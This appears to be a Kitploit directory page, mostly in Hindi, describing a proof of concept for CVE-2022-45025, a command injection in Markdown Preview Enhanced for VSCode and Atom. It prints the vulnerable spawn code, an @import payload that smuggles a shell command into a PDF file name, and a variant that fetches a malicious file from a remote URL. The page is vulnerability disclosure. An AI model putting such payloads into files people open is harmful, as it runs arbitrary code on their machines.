Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-45025 — [PoC] Markdown Preview Enhanced (VSCode, Atom) में PDF आयात के माध्यम से कमांड इंजेक्शन | Kitploit
उपकरण/GitHubGitHub/yuriisanin/cve-2022-45025
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubyuriisanin/cve-2022-45025

CVE-2022-45025

[PoC] Markdown Preview Enhanced (VSCode, Atom) में PDF आयात के माध्यम से कमांड इंजेक्शन

रिपॉजिटरी देखें
881713 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-45025

Markdown Preview Enhanced में PDF आयात के माध्यम से कमांड इंजेक्शन (VSCode, Atom)

विवरण

Mume मार्कडाउन टूल लाइब्रेरी {shell: true} विकल्प के साथ spawn कमांड के उपयोग के कारण कमांड इंजेक्शन के लिए संवेदनशील थी। इससे हमलावर पीड़ित को VSCode या Atom का उपयोग करके विशेष रूप से तैयार मार्कडाउन फ़ाइल खोलने के लिए धोखा देकर मनमाना कोड निष्पादन प्राप्त कर सकता था। यह लाइब्रेरी VSCode और Atom दोनों के लिए Markdown Preview Enhanced प्लगइन को संचालित करती है।

संवेदनशील कोड स्निपेट:

root@kitploit:~
const task = spawn(
      "pdf2svg",
      [
        `"${pdfFilePath}"`,
        `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
        "all",
      ],
      { shell: true },
    )

प्रमाण की अवधारणा

निम्नलिखित मार्कडाउन दस्तावेज़ एक हमलावर को मनमाना कमांड निष्पादित करने की अनुमति देता है:

root@kitploit:~
@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"

The following comment will be recognised by MPE as valid "@import" command:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->

वैकल्पिक रूप से, पेलोड को बाहरी स्रोत से निष्पादित किया जा सकता है:

root@kitploit:~
<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->

YouTube पर VSCode और Atom दोनों के लिए डेमो

vscode-rce-poc-gif

समर्थन

आप मुझे Twitter, GitHub या YouTube पर फ़ॉलो कर सकते हैं।

टूल डाउनलोड करें